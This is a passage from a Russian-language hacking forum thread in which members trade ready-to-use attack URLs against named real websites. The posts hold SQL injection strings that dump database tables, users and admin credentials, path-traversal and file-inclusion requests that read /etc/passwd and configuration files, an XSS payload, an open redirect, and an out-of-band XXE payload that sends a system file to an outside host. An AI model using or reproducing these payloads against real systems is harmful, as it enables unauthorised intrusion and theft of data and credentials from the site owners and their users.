Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. paponi

    paponi New Member

    Joined:
    30 May 2017
    Messages:
    12
    Likes Received:
    4
    Reputations:
    0
    Давно созрел вопрос, да только все никак руки не "доходили". Можно ли залить шелл вместо "load_file('/etc/passwd')"? Просто пока не понимаю, почему срабатывает php в SQL иньекции...
     
  2. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    _________________________
    Veil likes this.
  3. paponi

    paponi New Member

    Joined:
    30 May 2017
    Messages:
    12
    Likes Received:
    4
    Reputations:
    0
    Спасибо. Век живи, век учись.
     
    palec2006 and Grosser like this.
  4. Grosser

    Grosser New Member

    Joined:
    11 Oct 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    3
    Я кодинге не очень силен, но таковы правила форума и писать я могу только здесь. Помогите набрать 5 репутации
     
  5. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    PHP:
    http://www.handelingsgerichtwerken.be/bestanden/download.php?id=69'+and+false+union select null,2,3,4,group_concat(0x202020,table_name,0x3c3e,column_name)+from information_schema.columns+where table_schema=database()+--+-
     
    Octavian and SooLFaa like this.
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    447
    Likes Received:
    80
    Reputations:
    20
    Code:
    http://www.saifaiims.com/download.php?filename=../config/configuration.php
     
    ShpillyWilly likes this.
  7. The404

    The404 New Member

    Joined:
    9 Oct 2016
    Messages:
    6
    Likes Received:
    3
    Reputations:
    0
    Code:
    http://www.baikap.de/index2.php?include=/etc/passwd&id=85&language=E|LFI|[DE] Germany|12/21/2017 05:38:42
    http://www.avionews.it/index.php?corpo=/etc/passwd&news_id=1207340&pagina_chiamante=index.php|LFI|[IT] Italy|12/22/2017 06:51:05
    https://drbl.org/management/techrpt.php?c=../../../../../etc/passwd&t=Start, restart or stop DRBL-related services|LFI|[JP] Japan|12/23/2017 06:10:26
    http://caiana.caia.org.ar/template/caiana.php?pag=../../../../../etc/passwd&vol=3|LFI|[AR] Argentina|12/23/2017 08:47:59
    http://www.energetica-india.net/download.php?seccion=articles&archivo=../../../../../../../../etc/passwd|LFI|[ES] Spain|12/23/2017 08:52:43
    http://www.mcu.es/deportebase/cgi/um?M=/d7/f7&O=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00&N=&L=0|LFI|[ES] Spain|12/23/2017 09:00:57
    https://www.txregionalcouncil.org/display.php?page=/etc/passwd|LFI|[US] United States|12/23/2017 09:10:58
    http://www.basegroup.su/index.php?Page=http%3a%2f%2fwww.google.com|RFI|[RU] Russian Federation|12/23/2017 09:58:38
    http://www.iatvt.ru/index.cgi?doc=../../../../../../etc/passwd%00|LFI|[RU] Russian Federation|12/23/2017 10:54:42
    http://www.musifratz.de/content.php?seite=/etc/passwd&rubrik=kinderkultur&ansicht=projekte|LFI|[DE] Germany|12/23/2017 11:13:42
     
    Печа and ShpillyWilly like this.
  8. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    PHP:
    http://www.bpc.gov.bd/contactus.php?id=4439'+/*!12345UNiOn*/%0ASeLEct+1,2,/*!50000user()*/,4,5,6,7+--+_
    ebfashion.com.bd/index.php?id=-8'+UnIoN+SeLEcT+1,user(),2+--+-
    http://www.vertexhome.co.il/pageE.php?id=110+UnIon+SeLEct+1,2,3,4,5,6,7,8,9,group_concat(table_name),11 from information_schema.tables where table_schema=database()+--+-
    http://foundation.sigmachi.org/station.php?id=wtg'
    +and+false+UnIon%0ASeLEct+1,user(),3,4,5,6+--+_
    http
    ://www.commongroundnews.org/article.php?id=-32240'+/*!12345UnIoN%0ASeLEcT*/+1,2,user(),4,(/*!12345SELECT*/+/*!12345GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+/*!50000INFORMATION_SCHEMA.TABLES*/+WHERE+TABLE_SCHEMA=DATABASE()),6,7,8,9,10,11,12,131,4,15,15,15,15,15,16,16,22+--+-&lan=ba&sp=1
    http://oppodigital.in/product-details.php?id=9 and false UNiOn+SElEcT @,@,@,@,@,@,@,@,group_concat(table_name),@ from information_schema.tables #
    HTML:
    https://depositfiles.od.ua/tools/httpheaders.php
    [​IMG]
     
    #288 BabaDook, 2 Jan 2018
    Last edited: 6 Jan 2018
    panic.ker and grimnir like this.
  9. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    78
    Likes Received:
    3
    Reputations:
    0
    HTML:
    http://www.tnla.com/events.php?id=38+UNION+SELECT+1,concat(username,password)+from+tnlacom_tnla.admin_users+--+
     
  10. Mexel

    Mexel Member

    Joined:
    22 Nov 2016
    Messages:
    22
    Likes Received:
    10
    Reputations:
    3
    Провайдер Электронный щит.
    Локальная XSS.
    Code:
    http://wwwcom.ru/connect.php/%22%3E%3Cscript%3Ealert('Tayler(Mexel)')%3C/script%3E
     
  11. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    222
    Likes Received:
    373
    Reputations:
    100
    target: http://www.premium-network.ru
    type: Time-based, Error-based
    user: forumpt@localhost1
    version: 5.5.371

    Time-based:
    Code:
    www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15),1)--+


    Error-based:
    Code:
    http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(version(),floor(rand(0)*2))x,2,3%20from%20information_schema.tables%20group%20by%20x--+

     
  12. xaphan

    xaphan Member

    Joined:
    29 Jan 2018
    Messages:
    6
    Likes Received:
    10
    Reputations:
    4
    OOB XXE
    Code:
    http://www.xmlforasp.net/SchemaValidator.aspx

    XML Payload:

    Code:
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE test SYSTEM "http://host/file.dtd">
    <data>&test;</data>

    .dtd File:
    Code:
    <!ENTITY % file SYSTEM "file:///Windows/system32/drivers/etc/services">
    <!ENTITY % all "<!ENTITY send SYSTEM '?%file;'>">
    %all;

    [​IMG]
     
    ms13, crlf, BigBear and 4 others like this.
  13. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    Лайк тому кто попробует сделать с выводом, не люблю я слепые, OOB приветствуется.Точку входа не менять желательно.
     
  14. st55

    st55 Level 8

    Joined:
    20 Apr 2016
    Messages:
    174
    Likes Received:
    277
    Reputations:
    46
    Code:
    70('UNION ALL SELECT 1,2,version(),3-- a)---
    Вывод в мета-теге:
    Code:
    <META NAME="description" CONTENT="Последние новости, события и объявления для абонентов сети кабельного телевидения и Интернет Premium Net. 3 5.5.37">
     
    HeReTiC, crlf and BabaDook like this.
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    Code:
    <META NAME="keywords" CONTENT="Новости Пушкино Красноармейск Premium Net 4 5.5.37">
    
    70'+union+select+1,version(),3,4--+
    Тут же банально все, зачем скобки?
     
    crlf and BabaDook like this.
  16. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    PHP:
    http://www.boxofficemojo.com/.htaccess
    view-source:http://www.boxofficemojo.com/maintenance.html
     
    panic.ker likes this.
  17. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    447
    Likes Received:
    80
    Reputations:
    20
    Sql Injection
    Code:
    http://www.ceadir-lunga.md/index.php?prm=999%27+UNION+ALL+SELECT+version()+--+&mid=201
    http://retrofilms.in/forum/feedcat.php?id=2%27+union+all+select+1,2,3,4,5,6,7,8,9+--+
    Мда редкость
    Code:
    http://katalogshop.md/tmp/
     
    #297 Octavian, 4 Feb 2018
    Last edited: 4 Feb 2018
  18. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    HTML:
    http://pravoslavsad4.ru/view_index21b.php?id=-1%27%20UnIon%20SeLEct%201%2C2%2C3%2C4%2C5%2C6%2C0x3c7363726970743e616c65727428646f63756d656e742e646f6d61696e293c2f7363726970743e%20--%20-
     
  19. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    Что не получается? П.С только сейчас увидел ты это аттак
    PHP:
    http://атаксупермаркет.рф/goods.aspx?id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN+('yml_catalog','shop','email','currencies','currency','categories','category','offers','offer','categoryId','picture','orderingTime','onstock','ordering'))+--+
    Дальше сам

    HTML:
    https://rdot.org/forum/showthread.php?t=826
     
    #299 BabaDook, 6 Mar 2018
    Last edited: 6 Mar 2018
    crlf likes this.
  20. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,015
    Likes Received:
    1,363
    Reputations:
    43
    HTML:
    https://www.mournhockey.com.ua/go.php?http://FFFFFFF.org
    http://iz.com.ua/engine/go.php?url=aHR0cDovL2dvb2dMZS5jb20=
    
    OpenRedirect

    HTML:
    https://bosa.in.ua/event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%33%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3,4,5,6,7,8,9,database(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9,0,1+--+-
     
    #300 BabaDook, 17 Mar 2018
    Last edited: 20 Mar 2018
Loading...